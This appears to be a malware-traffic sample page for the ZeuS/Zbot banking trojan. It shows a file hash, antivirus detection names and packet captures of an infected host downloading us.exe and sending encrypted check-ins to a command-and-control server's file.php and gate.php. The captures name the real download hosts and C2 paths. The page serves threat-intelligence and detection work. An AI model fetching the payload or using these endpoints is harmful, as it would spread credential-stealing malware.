ZeuS Zbot /demo/sites/a/file.php us.exe gate.php Malware Trojan PCAP file download traffic sample

SHA256: 845fb85d4b72012d9928c0860afba60e843a7eabaf441a84e91381603c39ff87
File name: us.exe
Detection ratio: 47 / 56
Analysis date: 2016-10-26 23:42:12 UTC ( 0 minutes ago )

 

ALYac MemScan:Trojan.Spy.Zbot.FQL 20161026
AVG PSW.Generic12.CIMR 20161026
Ad-Aware MemScan:Trojan.Spy.Zbot.FQL 20161026
AegisLab Troj.Spy.W32.Zbot!c 20161026
AhnLab-V3 Spyware/Win32.Generic.C858104 20161026
Antiy-AVL Trojan[Spy]/Win32.Zbot 20161026
Arcabit Trojan.Spy.Zbot.FQL 20161026
Avast Sf:Crypt-BR [Trj] 20161026
Avira (no cloud) TR/Spy.Gen 20161026
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20161026
BitDefender MemScan:Trojan.Spy.Zbot.FQL 20161027
Bkav W32.Clod730.Trojan.ef73 20161026
CAT-QuickHeal Trojan.Generic.21003 20161026
Comodo TrojWare.Win32.Zbot.NEWA 20161026
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20160725
Cyren W32/Zbot.BR.gen!Eldorado 20161027
DrWeb Trojan.PWS.Panda.10359 20161027
ESET-NOD32 Win32/Spy.Zbot.AAO

 

2016-10-26 01:14:15.132041 IP 192.168.1.102.62344 > 169.239.129.118.80: Flags [P.], seq 0:297, ack 1, win 256, length 297: HTTP: GET /scryba/files/us.exe HTTP/1.1
E..Q
.@….H…f…v…P.QC..7.8P…….GET /scryba/files/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 169.239.129.118
Connection: Keep-Alive

2016-10-26 01:14:15.412788 IP 192.168.1.102.62344 > 169.239.129.118.80: Flags [F.], seq 297, ack 479, win 254, length 0
E..(

E..([.@……..fg..S…P..]..x.?P….8……..
2016-10-26 01:14:31.777325 IP 192.168.1.102.62345 > 103.6.246.83.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /music/dizi/us.exe HTTP/1.1
E..N[.@…~y…fg..S…P..]..x.?P…….GET /music/dizi/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: intcomsync.com
Connection: Keep-Alive

2016-10-26 01:14:32.053748 IP 192.168.1.102.62345 > 103.6.246.83.80: Flags [.], ack 11489, win 256, length 0
E..([.@……..fg..S…P..^9.x..P….1……..

E..(\#@….D…fg..S…P..|.l…P…P………
2016-10-26 01:14:47.195433 IP 192.168.1.102.62346 > 103.6.246.83.80: Flags [P.], seq 0:371, ack 1, win 256, length 371: HTTP: POST /demo/sites/a/file.php HTTP/1.1
E…\$@…}….fg..S…P..|.l…P…….POST /demo/sites/a/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

u*..C…i.L.o(.5.)w…@.”…..t..U.U.D.P.gfQoO…\tVe..*Z……..e…….R:IQ..$……….T..J….Eg.k……..[.3r….R……?.d…..WA”..(T.O
2016-10-26 01:14:47.200188 IP 192.168.1.102.62347 > 103.6.246.83.80: Flags [.], ack 1350356609, win 256, length 0
E..(\%@….B…fg..S…P….P|..P………….
2016-10-26 01:14:47.200679 IP 192.168.1.102.62347 > 103.6.246.83.80: Flags [P.], seq 0:359, ack 1, win 256, length 359: HTTP: POST /demo/sites/a/file.php HTTP/1.1
E…\&@…}….fg..S…P….P|..P….P..POST /demo/sites/a/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

…OZ..}.O.+..}…..A}=KH.i….u.       .Z
..c….
..~6.a!….N…..L,.g..7Km..y.S.>.c..Tt….HNj.H.._,A…..#v..IL].A….q.i…~6…..s

 

2016-10-26 01:15:16.470382 IP 192.168.1.102.62353 > 103.6.246.83.80: Flags [P.], seq 0:644, ack 1, win 256, length 644: HTTP: POST /demo/sites/a/gate.php HTTP/1.1
E…].@…{….fg..S…P…..nQ.P…Vy..POST /demo/sites/a/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache

..R,………o…….._…..<rio.|[?..?…e.
…S.2j.35’e…P..s.Kw…….3.`.A……~..J”)J.*.{d…3[..5Yl.2.v.[.p.>f       …1.X.0……….M     ………..J.0X._.b.8T..CO.)y]..g.?…jc….V……….dX.i.>.j~[..+.l2..h…T.t….Y?.E.F*.>..).t:V…u….(….jQ.H…Dv>l…x.B….]..p…….X………….
…?4D…H.]…s …Me…..Pn…5<..m..M..Z.J..C..= S.+…..I.6.C”ue.!